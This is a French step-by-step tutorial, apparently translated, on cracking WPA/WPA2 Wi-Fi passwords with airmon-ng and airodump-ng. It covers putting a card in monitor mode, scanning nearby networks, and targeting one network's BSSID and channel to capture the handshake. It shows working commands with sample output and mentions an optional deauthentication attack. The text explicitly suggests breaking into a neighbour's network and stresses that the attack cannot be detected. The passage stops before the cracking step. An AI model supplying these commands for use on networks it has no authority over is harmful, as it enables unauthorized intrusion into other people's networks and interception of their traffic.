
Casser les routeurs Wi-Fi WPA/WPA2 avec Airodump-ng et Aircrack-ng/Hashcat
Craquez les routeurs Wi-Fi WPA/WPA2 avec Airodump-ng et Aircrack-ng/Hashcat.
Ceci est un bref tutoriel pas à pas qui illustre comment craquer les réseaux Wi-Fi sécurisés avec des mots de passe faibles. Il n'est pas exhaustif, mais il devrait vous donner suffisamment d'informations pour tester la sécurité de votre propre réseau ou pénétrer un réseau voisin. L'attaque décrite ci-dessous est entièrement passive (écoute uniquement, rien n'est diffusé depuis votre ordinateur) et il est impossible de la détecter à condition que vous n'utilisiez pas réellement le mot de passe que vous craquez. Une attaque active optionnelle de désauthentification peut être utilisée pour accélérer le processus de reconnaissance et est décrite à la fin de ce document.
Si vous êtes familier avec ce processus, vous pouvez sauter les descriptions et passer directement à la liste des commandes en bas de page. Pour une variété de suggestions et de méthodes alternatives, consultez l'annexe. neal1991 et tiiime ont également gracieusement fourni des traductions de ce document et de l'annexe en chinois si vous préférez ces versions.
AVERTISSEMENT : Ce logiciel/tutoriel est destiné uniquement à des fins éducatives. Il ne doit pas être utilisé pour des activités illégales. L'auteur n'est pas responsable de son utilisation. Ne soyez pas un imbécile.
Ce tutoriel suppose que vous :
sudo apt-get install aircrack-ngCommencez par lister les interfaces sans fil qui prennent en charge le mode moniteur avec :
airmon-ng
Si vous ne voyez aucune interface listée, alors votre carte sans fil ne supporte pas le mode moniteur 😞
Nous supposerons que le nom de votre interface sans fil est wlan0, mais assurez-vous d'utiliser le bon nom s'il diffère. Ensuite, nous allons placer l'interface en mode moniteur :
airmon-ng start wlan0
Exécutez iwconfig. Vous devriez maintenant voir une nouvelle interface en mode moniteur listée (probablement mon0 ou wlan0mon).
Commencez à écouter les trames balises 802.11 diffusées par les routeurs sans fil à proximité en utilisant votre interface moniteur :
airodump-ng mon0
Vous devriez voir un résultat similaire à celui ci-dessous.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
Pour les besoins de cette démo, nous choisirons de craquer le mot de passe de mon réseau, "hackme". Souvenez-vous de l'adresse MAC BSSID et du numéro de canal (CH) affichés par airodump-ng, car nous en aurons besoin pour l'étape suivante.
WPA/WPA2 utilise une poignée de main à 4 voies pour authentifier les appareils sur le réseau. Vous n'avez pas besoin de savoir ce que cela signifie, mais vous devez capturer l'une de ces poignées de main afin de craquer le mot de passe du réseau. Ces poignées de main se produisent chaque fois qu'un appareil se connecte au réseau, par exemple, lorsque votre voisin rentre du travail. Nous capturons cette poignée de main en dirigeant airmon-ng pour surveiller le trafic sur le réseau cible en utilisant le canal et la valeur bssid découverts lors de la commande précédente.
# remplacez les valeurs -c et --bssid par celles de votre réseau cible
# -w spécifie le répertoire où nous enregistrerons la capture de paquets
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
Maintenant, nous attendons... Une fois que vous avez capturé une poignée de main, vous devriez voir quelque chose comme [ WPA handshake: bc:d3:c9:ef:d2:67 en haut à droite de l'écran, juste à droite de l'heure actuelle.
Si vous êtes impatient et que vous êtes à l'aise avec une attaque active, vous pouvez forcer les appareils connectés au réseau cible à se reconnecter en leur envoyant des paquets de désauthentification malveillants. Cela aboutit souvent à la capture d'une poignée de main à 4 voies. Consultez la section sur l'attaque deauth ci-dessous pour plus d'informations.